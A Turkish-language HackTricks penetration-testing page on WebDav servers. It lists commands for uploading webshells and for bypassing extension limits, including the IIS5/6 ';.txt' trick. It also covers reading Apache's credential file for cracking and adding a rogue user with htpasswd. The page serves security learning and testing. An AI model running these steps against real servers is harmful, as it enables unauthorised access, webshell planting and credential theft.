WebDav

Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin. Bugün Erişim Alın:

Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:

WebDav özellikli bir HTTP Sunucusu ile uğraşırken, genellikle HTTP Temel Kimlik Doğrulaması aracılığıyla doğrulanan doğru kimlik bilgilerine sahipseniz, dosyaları manipüle etmek mümkündür. Bu tür bir sunucu üzerinde kontrol sağlamak genellikle bir webshell yükleyip çalıştırmayı içerir.

WebDav sunucusuna erişim genellikle geçerli kimlik bilgileri gerektirir, bunları elde etmek için WebDav brute force yaygın bir yöntemdir.

Sunucu tarafı betiklerin çalışmasını engelleyen dosya yükleme kısıtlamalarını aşmak için şunları yapabilirsiniz:

  • Eğer kısıtlama yoksa, yürütülebilir uzantılara sahip dosyaları doğrudan yükleyin.

  • Yüklenen yürütülemez dosyaları (örneğin .txt) yürütülebilir bir uzantıya yeniden adlandırın.

  • Yüklenen yürütülemez dosyaları, uzantılarını yürütülebilir olan bir uzantıya değiştirerek kopyalayın.

DavTest

Davtest, farklı uzantılara sahip birkaç dosyayı yüklemeyi dener ve uzantının çalıştırılıp çalışılmadığını kontrol eder:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Bu, .txt ve .html uzantılarının yürütüldüğü anlamına gelmez. Bu, bu dosyalara web üzerinden erişebileceğiniz anlamına gelir.

Cadaver

Bu aracı kullanarak WebDav sunucusuna bağlanabilir ve eylemler (örneğin yüklemek, taşımak veya silme) yapabilirsiniz manuel olarak.

cadaver <IP>

PUT isteği

curl -T 'shell.txt' 'http://$ip'

TAŞIMA isteği

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen otomatik iş akışları oluşturun ve otomatikleştirin. Bugün Erişim Alın:

IIS5/6 WebDav Zafiyeti

Bu zafiyet çok ilginç. WebDav, dosyaların uzantısı .asp olan dosyaların yüklenmesine veya yeniden adlandırılmasına izin vermez. Ancak dosya adının sonuna ";.txt" ekleyerek bunu atlayabilirsiniz ve dosya .asp dosyasıymış gibi çalıştırılacaktır (aynı zamanda ".txt" yerine ".html" kullanabilirsiniz ama ";"'yi unutmayın).

Sonra kabuğunuzu ".txt" dosyası olarak yükleyebilir ve onu ".asp;.txt" dosyasına kopyalayabilir/taşıyabilirsiniz. Bu dosyaya web sunucusu üzerinden erişildiğinde çalıştırılacaktır (cadaver taşıma işleminin çalışmadığını söyleyecektir, ancak çalışmıştır).

Kimlik bilgilerini gönder

Webdav bir Apache sunucusu kullanıyorsa, Apache'de yapılandırılmış sitelere bakmalısınız. Genellikle: /etc/apache2/sites-enabled/000-default

İçinde şuna benzer bir şey bulabilirsiniz:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
<p>Webdav sunucusu için geçerli **kimlik bilgileri** içeren dosyaları görebilirsiniz:</p>
/etc/apache2/users.password

Bu tür dosyaların içinde kullanıcı adı ve şifrenin hash'i bulunur. Bunlar, webdav sunucusunun kullanıcıları doğrulamak için kullandığı kimlik bilgileridir.

Onları kırmayı deneyebilir veya bir nedenden dolayı webdav sunucusuna erişmek istiyorsanız daha fazla ekleyebilirsiniz:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Yeni kimlik bilgilerinin çalışıp çalışmadığını kontrol etmek için şunu yapabilirsiniz:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Referanslar

Sıfırdan kahramana kadar AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

  • Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!

  • [The PEASS Family]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [NFT'lerimiz]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu

  • Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm'da takip edin.

  • Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.

[Trickest]'i (https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen ve otomatikleştirmeleri kolayca oluşturun. Bugün Erişim Alın:

Last updated